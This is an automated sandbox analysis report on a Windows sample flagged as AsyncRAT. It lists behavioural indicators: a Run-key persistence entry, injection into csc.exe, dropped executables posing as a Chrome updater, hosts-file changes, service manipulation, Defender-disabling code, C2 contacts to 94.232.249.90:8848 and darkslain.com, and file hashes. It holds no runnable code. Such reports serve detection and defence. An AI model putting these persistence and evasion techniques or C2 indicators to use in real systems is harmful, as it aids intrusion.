Malware Analysis Report

2024-09-22 07:12

Sample ID 240601-sra71sfd7z
Target SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe
SHA256 b98132aea04a11317b8756786a12f51adbabe38e90d43fdfbc3095e1ad4c4e9a
Tags
asyncrat default persistence rat evasion execution
score
10/10

Analysis Overview

score
10/10

SHA256

b98132aea04a11317b8756786a12f51adbabe38e90d43fdfbc3095e1ad4c4e9a

Threat Level: Known bad

The file SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default persistence rat evasion execution

AsyncRat

Contains code to disable Windows Defender

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Blocklisted process makes network request

Creates new service(s)

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious use of UnmapMainImage

Analysis: static1

Detonation Overview

Reported

2024-06-01 15:21

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 15:21

Reported

2024-06-01 15:23

Platform

win7-20240221-en

Max time kernel

119s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe"

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmokerLtd = "C:\\Users\\Admin\\Documents\\Noments\\Toopan.exe" C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2248 set thread context of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2248 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2496 wrote to memory of 2692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe
PID 2692 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe

"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe

"C:\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 244

Network

Country Destination Domain Proto
SY 94.232.249.90:8848 tcp
SY 94.232.249.90:8848 tcp
US 8.8.8.8:53 www.darkslain.com udp
US 104.21.37.86:443 www.darkslain.com tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar5A47.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

\Users\Admin\AppData\Local\Temp\o3TjZ53I.exe

MD5 093c50edbabb0dab0b39658a6ac83e2d
SHA1 fecfd0c6d525b8060868db0863b23147cd3e8317
SHA256 ea91b53fbe1f61c3d4e619baeeb3dec455db658c1e9c2c43df2a53d6772e81ba
SHA512 264f72b74cd4c97d2180b9830be6fa938bd036acc88b2e5792c26722729aa16bde4131c359743821d2e4712596e5f79d40ce8ff682c3b41223f296205fd419c1

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 15:21

Reported

2024-06-01 15:23

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

145s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Windows\SysWOW64\msdr.exe N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokerLtd = "C:\\Users\\Admin\\Documents\\Noments\\Toopan.exe" C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\SysWOW64\msdr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Google\Chrome\updater.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Windows\SysWOW64\msdr.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={71141597-B88E-48A4-AD76-13AD089071B0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 01 Jun 2024 15:22:38 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717255357" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\Windows\SysWOW64\msdr.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
